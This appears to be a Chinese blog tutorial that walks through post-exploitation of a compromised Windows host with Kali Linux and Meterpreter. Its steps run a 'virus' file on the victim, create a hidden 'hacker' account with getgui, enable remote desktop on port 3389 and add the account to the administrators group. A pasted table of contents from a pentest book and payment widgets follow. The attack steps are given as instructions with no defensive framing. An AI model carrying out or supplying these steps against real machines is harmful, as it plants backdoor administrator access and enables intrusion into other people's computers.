网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战

187 篇文章 10 订阅
173 篇文章 3 订阅

一、背景介绍
在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.已经被控制的Windows主机一个;
3.整装待发的小白一个。
三、战略安排
3.1查看kali虚拟机sessions状况,如下图所示。
命令:sessions
c
在这里插入图片描述

3.2 在受害者主机执行病毒文件,如下图所示。
步骤:双击如下图所示的文件
在这里插入图片描述

3.3 再次在Kali Linux中执行sessions命令,如下图所示。
命令:sessions
在这里插入图片描述

3.4 执行命令,给受害者主机创建用户,如下图所示。
命令:sessions -i 5
run getgui -u 用户名 -p 密码
Eg: run getgui -u hacker -p 123456
在这里插入图片描述

3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。
命令:run getgui -e
在这里插入图片描述

3.5.1 执行结果如下图所示。
在这里插入图片描述

3.6 查看受害者主机的ip地址,如下图所示。
命令:ipconfig
在这里插入图片描述

3.7 连接受害者主机的远程桌面,如下图所示。
命令:rdesktop 192.168.0.107:3389
在这里插入图片描述

3.7.1 登录窗口如下图所示,根据创建的用户进行登录
在这里插入图片描述

3.8 遇到创建的用户不是管理员组用户的问题,如下图所示
在这里插入图片描述

3.9 解决升级管理员权限的问题
3.9.1 启动dos窗口
命令:shell
在这里插入图片描述

3.9.2 升级管理员用户,如下图所示。
命令:localgroup administrators 用户名 /add
Eg :localgroup administrators hacker /add
在这里插入图片描述

3.9.3 解决乱码问题,如下图所示。
命令:chcp 65001
在这里插入图片描述

3.10 继续登录,如下图所示。
3.10.1 登录界面
4

3.10.2 选择是
在这里插入图片描述
在这里插入图片描述

3.11 渗透成功,如下图所示。

在这里插入图片描述
在这里插入图片描述

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
点我学习完整视频渗透课,预计更新1000节

  • 4
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值